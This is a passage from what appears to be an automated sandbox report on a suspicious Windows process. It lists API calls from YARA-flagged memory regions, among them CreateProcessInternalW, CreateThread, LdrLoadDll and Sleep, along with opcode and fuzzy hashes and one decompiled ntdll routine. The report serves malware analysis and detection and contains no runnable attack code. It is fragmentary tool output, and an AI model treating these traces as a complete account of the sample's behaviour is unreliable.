                                                                      APIs
                                                                      • NtClose.NTDLL(030B3D30,?,?,030B3D30,00000000,FFFFFFFF), ref: 030B8315
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d649fa007d5652054ec06a09fc84ca166428d3bccfd085ac4eadb302fc12d348
                                                                      • Instruction ID: c30ef066176dc5d58f0b183197f65d529cfb16ff52de621ad5461876882de101
                                                                      • Opcode Fuzzy Hash: d649fa007d5652054ec06a09fc84ca166428d3bccfd085ac4eadb302fc12d348
                                                                      • Instruction Fuzzy Hash: FA9002A1282000036115715D4414616405AABE0245F51C021E1005591DC565D8957165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f292a215174fd4f032968f09e828cb61908ba0bdc714b61acda64a3e18b20456
                                                                      • Instruction ID: 6f107de8178d3b2a8cfa0f468e7fc8d7530060dea108abe643a36b65c07b3640
                                                                      • Opcode Fuzzy Hash: f292a215174fd4f032968f09e828cb61908ba0bdc714b61acda64a3e18b20456
                                                                      • Instruction Fuzzy Hash: FC90027128504842F150715D4404A460065ABD0349F51C011A0055695D9665DD59B6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f1d1c48c383f2baacdcc01131cb52cb960b12174ea0102ddf5065f4b30eef34e
                                                                      • Instruction ID: 21ed0b86df4bc4c6e2a1224dbcb4c6d00c000897e55d6cca7c89b9aaacf6445f
                                                                      • Opcode Fuzzy Hash: f1d1c48c383f2baacdcc01131cb52cb960b12174ea0102ddf5065f4b30eef34e
                                                                      • Instruction Fuzzy Hash: D090027128100802F190715D440464A0055ABD1345F91C015A0016655DCA55DA5D77E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a6e1d0b0667a8b0d4a9c3202a38871ec3c658874ab41fcbc27b1808e95ebcff3
                                                                      • Instruction ID: 344f4862e266c09336cc6c6409f27a7f242cb6df2d44d6e14f7bedfdd35118a7
                                                                      • Opcode Fuzzy Hash: a6e1d0b0667a8b0d4a9c3202a38871ec3c658874ab41fcbc27b1808e95ebcff3
                                                                      • Instruction Fuzzy Hash: FD90027128100842F110615D4404B460055ABE0345F51C016A0115655D8655D8557561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3856e5bfe8d061e780ae389cbae25e14388656e2cca1fc65d59cdfb67f0f2f7d
                                                                      • Instruction ID: a8df5bf45ed850242cb8e87f4eac8524afb24262160c670e868c05278f241883
                                                                      • Opcode Fuzzy Hash: 3856e5bfe8d061e780ae389cbae25e14388656e2cca1fc65d59cdfb67f0f2f7d
                                                                      • Instruction Fuzzy Hash: 7C90027128108802F120615D840474A0055ABD0345F55C411A4415659D86D5D8957161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 0a8776b651fc3a3e3e588426aef09ce07876fdaf061893dc6349e9c9c1d0eedd
                                                                      • Instruction ID: 0d79cfe548bc9769c0042d0beaa9baefc3dac8c547dc8380603e82d02d2aecc3
                                                                      • Opcode Fuzzy Hash: 0a8776b651fc3a3e3e588426aef09ce07876fdaf061893dc6349e9c9c1d0eedd
                                                                      • Instruction Fuzzy Hash: A590027128100402F110659D54086460055ABE0345F51D011A5015556EC6A5D8957171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f4c6aae166abb4aa9d62c77798228dba92db7e34ddbfbbdb0723bce2d3ff49bf
                                                                      • Instruction ID: c09084bf739df3fc4d0334ab2c881e4756234e951e4d892e2c17bd0dd7e3992c
                                                                      • Opcode Fuzzy Hash: f4c6aae166abb4aa9d62c77798228dba92db7e34ddbfbbdb0723bce2d3ff49bf
                                                                      • Instruction Fuzzy Hash: 7A90027139114402F120615D84047060055ABD1245F51C411A0815559D86D5D8957162
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b2e77e58497389a3548e50070291c7cec2f289ac9c7a92d9b294bca3ec375654
                                                                      • Instruction ID: b3170c45fadf179fad16bdba41a9dfbb7913112525e7e8bcc0dec4c88b365795
                                                                      • Opcode Fuzzy Hash: b2e77e58497389a3548e50070291c7cec2f289ac9c7a92d9b294bca3ec375654
                                                                      • Instruction Fuzzy Hash: 9190026929300002F190715D540860A0055ABD1246F91D415A0006559CC955D86D7361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bcf7f767c90850c6fe5ea6c3da68c611e1c573b4d3f171c801e1911e4bf518b0
                                                                      • Instruction ID: 944a2c1aad5046b1258b9d1f33841f752d1cf28fc49358ad57ac68086b52b0be
                                                                      • Opcode Fuzzy Hash: bcf7f767c90850c6fe5ea6c3da68c611e1c573b4d3f171c801e1911e4bf518b0
                                                                      • Instruction Fuzzy Hash: 3D9002612C2041527555B15D44045074056BBE0285B91C012A1405951C8566E85AF661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ee5ebf659001dea02fd6439480f52a33c7cd615c23c78c4080a6bb69708ca13a
                                                                      • Instruction ID: c18b6c9460213f45d3dec6060d402ea4a7f6520008163c71abee5f9a6bb41351
                                                                      • Opcode Fuzzy Hash: ee5ebf659001dea02fd6439480f52a33c7cd615c23c78c4080a6bb69708ca13a
                                                                      • Instruction Fuzzy Hash: 2890027128100413F121615D45047070059ABD0285F91C412A0415559D9696D956B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e1e0e502e483b66425731212d47ead764ba89ed1247bd4e975f0ce7401b20030
                                                                      • Instruction ID: 80ba37fefee186b7d256868a8cccfb382756e347a9e3656f8c7a662933d18b6a
                                                                      • Opcode Fuzzy Hash: e1e0e502e483b66425731212d47ead764ba89ed1247bd4e975f0ce7401b20030
                                                                      • Instruction Fuzzy Hash: CD9002B128100402F150715D44047460055ABD0345F51C011A5055555E8699DDD976A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 51b3321488ce524d974c0cc7097024d803d19a0d7c69937e557b17ae820e8ec4
                                                                      • Instruction ID: 565f99832bd9ea70efa6e4f4d506080589d61996f2d184742f05790fca5f88f9
                                                                      • Opcode Fuzzy Hash: 51b3321488ce524d974c0cc7097024d803d19a0d7c69937e557b17ae820e8ec4
                                                                      • Instruction Fuzzy Hash: BA9002A13C100442F110615D4414B060055EBE1345F51C015E1055555D8659DC567166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 37041a17dcbb6dc4bd391086d2be11473516b07633e8acbf854f9d8a81d799df
                                                                      • Instruction ID: 78ab1a61d46c2073896a9cdb97e8d6a87dfd3d22b114ada43edbb28b3602587a
                                                                      • Opcode Fuzzy Hash: 37041a17dcbb6dc4bd391086d2be11473516b07633e8acbf854f9d8a81d799df
                                                                      • Instruction Fuzzy Hash: A990026129180042F210656D4C14B070055ABD0347F51C115A0145555CC955D8657561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 030B6F88
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
                                                                      • Instruction ID: c456c24d9289eb79892c62ab45260832bdf4754bfd460eec38e925bc78549ab3
                                                                      • Opcode Fuzzy Hash: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
                                                                      • Instruction Fuzzy Hash: C43160B5602709ABC751DF64C8A1FE7B7F8AB88700F04855DF61A6B240D771B545CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 030B6F88
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: d04be055dc302280fe78d6e4de035a3618d939de21f24231bdd747296999e526
                                                                      • Instruction ID: 43e0a839144e831909aafc09f3b052fc230e9e71977e8ef76d76d700a1c1f118
                                                                      • Opcode Fuzzy Hash: d04be055dc302280fe78d6e4de035a3618d939de21f24231bdd747296999e526
                                                                      • Instruction Fuzzy Hash: E121A2B5602305ABC711DFA4C8A0FEBB7F4EB88710F04856DF6196B280D771A545CBE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030A3B93), ref: 030B84FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction ID: e096c0a896ecc545c184b5c38df20080c7919e418fd5d289897d0872dfb8e2ed
                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction Fuzzy Hash: 4EE01AB52002046BD714DF59CC44EE777ACEF88650F018555F9085B251C630E910CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030A72BA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030A72DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                      • Instruction ID: 62f627a0f647ba517721e1cb66bfb78e77260042cb47ebbd41a0b22e72b48196
                                                                      • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                      • Instruction Fuzzy Hash: CD01F231A8232876E720E6D89C02FFEB76C9B80F50F144019FF04BE1C1E6A4690683F5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 030A9B92
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                      • Instruction ID: fa453da844e468f34507206eef6d246d3c9f03d7520c687834d56b6bfa863686
                                                                      • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                      • Instruction Fuzzy Hash: 5F011EB9E1120DBBDF10DAE4ED41FDDB7B89B54208F044195AA089B241F631EB14CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030B8594
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: c6dc7d5f12d27e3b612536aea087b6a30286916a5f54c0b4b4e78d866914d871
                                                                      • Instruction ID: 1f2b7d745753b81a73843f97e13a88637a814b2f6d7952dbd0feba6f0b740748
                                                                      • Opcode Fuzzy Hash: c6dc7d5f12d27e3b612536aea087b6a30286916a5f54c0b4b4e78d866914d871
                                                                      • Instruction Fuzzy Hash: 8901AFB2210108AFCB54DF99DC80EEB37ADAF8C364F158658FA1DD7290C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030B8594
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction ID: ec6efd227701b8ad28ba618d465f1698ae2c942cb07d37e72581066ffe64897d
                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction Fuzzy Hash: B901AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97250C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030ACCD0,?,?), ref: 030B704C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
                                                                      • Instruction ID: 4c28cd87536db122178ca3012a29d09fc12a5eaefede3c5985c5d286eedc52e6
                                                                      • Opcode Fuzzy Hash: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
                                                                      • Instruction Fuzzy Hash: 5FE06D373913043AE330A5999C02FE7B3AC8BD1B20F540026FA0DEB2C0D5A5F80242A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030ACCD0,?,?), ref: 030B704C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 36d5e91dbe184978dff326045b69fb06519d0e4513c7b9aecefaf6d5be2f606d
                                                                      • Instruction ID: 7be2ed632d63b48439719f2dd69aaad141c81512dbd61ea0b4b588abc30ede38
                                                                      • Opcode Fuzzy Hash: 36d5e91dbe184978dff326045b69fb06519d0e4513c7b9aecefaf6d5be2f606d
                                                                      • Instruction Fuzzy Hash: BDE04F7A39130076E330A6588C02FE7B2A98BD1B10F69041AF649BF2C0D5A5F90246A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,030ACFA2,030ACFA2,?,00000000,?,?), ref: 030B8660
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction ID: 9e3a32184ccf7b339460a85fee2eba4b60f26a89a85176b206e99e9667ae836b
                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction Fuzzy Hash: 23E01AB52002086BDB10DF49CC84EE737ADEF88650F018555FA085B241C930E8108BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(030B3516,?,030B3C8F,030B3C8F,?,030B3516,?,?,?,?,?,00000000,00000000,?), ref: 030B84BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction ID: 7ecfa185e75d4d812f0acf5e60a846eacf87e438e0b4f88b0477a19f5587bb47
                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction Fuzzy Hash: CCE012B6200208ABDB14EF99CC40EE777ACEF88650F118959FA085B241CA30F910CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,030A7C63,?), ref: 030AD43B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                      • Instruction ID: 46255f62d8f740e5b48d55c0e2bb9d0a764bedd5d25e73d5186b1b1884653b28
                                                                      • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                      • Instruction Fuzzy Hash: 13D0A7757503043BE710FBE89C03F6672CC5B54A00F494064F949DB3C3D960F4004565
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 80213cf99b5206010d8619c959d3ce2b448b041f5e55e6566a464bf5d2e0a510
                                                                      • Instruction ID: 6007ae5d9c77c1f80409dfe5513195e5697d76bf252eec4112947c2ab634641d
                                                                      • Opcode Fuzzy Hash: 80213cf99b5206010d8619c959d3ce2b448b041f5e55e6566a464bf5d2e0a510
                                                                      • Instruction Fuzzy Hash: 06B09BB19414C5C9F711D7A4560871779507BD0745F16C055D1020645A4778D0D5F6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 53%
                                                                      			E0461FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];
                                                                      				_t15 = _t12;
                                                                      				_t7 = E045CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				_push(_t13);
                                                                      				E04615720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                      				_t9 =  *_t15;
                                                                      				if(_t9 == 0xffffffff) {
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                      				return E04615720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                      			}











                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0461FDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0461FE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0461FE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: 9a66512f1277d997a9e9a0bcfa618b6350156c34b75ca445b8fa90027d905564
                                                                      • Instruction ID: 191b6f7c2ca05b33905a5b93b39a743bb4d16f20ef6e3d90eabb488058e9293e
                                                                      • Opcode Fuzzy Hash: 9a66512f1277d997a9e9a0bcfa618b6350156c34b75ca445b8fa90027d905564
                                                                      • Instruction Fuzzy Hash: 8DF0F632200201BFE6251A55DC02F23BF6BEB84730F180318F628561E1EA62F860E6F4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%